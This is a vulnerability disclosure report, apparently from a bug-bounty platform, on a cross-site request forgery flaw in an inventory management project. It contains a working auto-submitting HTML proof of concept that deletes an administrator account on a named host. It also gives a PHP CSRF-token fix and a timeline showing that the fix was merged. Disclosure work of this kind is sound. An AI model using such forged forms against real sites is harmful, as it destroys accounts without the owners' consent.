Cross-Site Request Forgery (CSRF) in amirsanni/mini-inventory-and-sales-management-system

Valid

Reported on

Sep 7th 2021


✍️ Description

An attacker is able to delete administrator accounts if a logged-in administrator visits an attacker-controlled website.

🕵️‍♂️ Proof of Concept

1. While logged in, open this POC.html in a browser (Firefox and Safari).
2. Observe that an administrator account has been deleted without your intent.


POC.html:

```html
<html>
 <body>
 <script>history.pushState('', '', '/')</script>
   <form action="https://1410inc.xyz/mini-inventory-and-sales-management-system/administrators/delete" method="POST">
     <input type="hidden" name="_aId" value="396" />
     <input type="submit" value="Submit request" />
   </form>
   <script>
     document.forms[0].submit();
   </script>
 </body>
</html>
```

💥 Impact

This vulnerability allows an attacker to forge a request from an authenticated administrator that unintentionally deletes an account.

💥 Test

Tested on Firefox and Safari.

💥 Fix

A CSRF token should be required on this request: the server issues a secret, per-session token that only pages from its own origin can read, embeds it in the form, and rejects any POST that does not carry a matching value. The forged form above cannot obtain that token, so the request fails.
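An added example of that synchronizer-token fix in PHP; it is not the project's own code, and it assumes the application keeps the logged-in administrator in a PHP session and that the delete handler reads `_aId` from the POST body as the PoC does. If the application is built on CodeIgniter 3 (an assumption), enabling its built-in `csrf_protection` config option is the shorter route; the block shows the mechanism that option implements.

```php
<?php
// Added example (not the project's code): synchronizer-token CSRF protection
// for a state-changing endpoint such as administrators/delete.
// Assumes a PHP session holds the logged-in administrator's identity.
session_start();

// Issue one random token per session; call this when rendering the admin page.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in every form that changes server-side state.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// A form served from another origin cannot read the session token, so it
// cannot supply a matching value. hash_equals() keeps the comparison constant-time.
function csrf_valid(array $post): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Hardened delete handler (hypothetical name): POST only, token required,
// and the id validated before any database work.
function delete_administrator(array $post): array
{
    if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !csrf_valid($post)) {
        http_response_code(403);
        return ['ok' => false, 'error' => 'missing or invalid CSRF token'];
    }
    $aId = filter_var($post['_aId'] ?? null, FILTER_VALIDATE_INT);
    if ($aId === false) {
        http_response_code(400);
        return ['ok' => false, 'error' => 'invalid _aId'];
    }
    // ... perform the delete for $aId here ...
    return ['ok' => true, 'deleted' => $aId];
}
```

As defence in depth, issuing the session cookie with `SameSite=Lax` (the `samesite` option of `session_set_cookie_params()` in PHP 7.3 and later) stops browsers from attaching it to the cross-site POST the PoC relies on; the token check remains the primary control.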


We have contacted a member of the amirsanni/mini-inventory-and-sales-management-system team and are waiting to hear back 3 months ago
Musio (Researcher), 3 months ago:

Hi, have you checked this report?

Amir validated this vulnerability 10 days ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
Amir confirmed that a fix has been merged on ba36f6 10 days ago
Amir has been awarded the fix bounty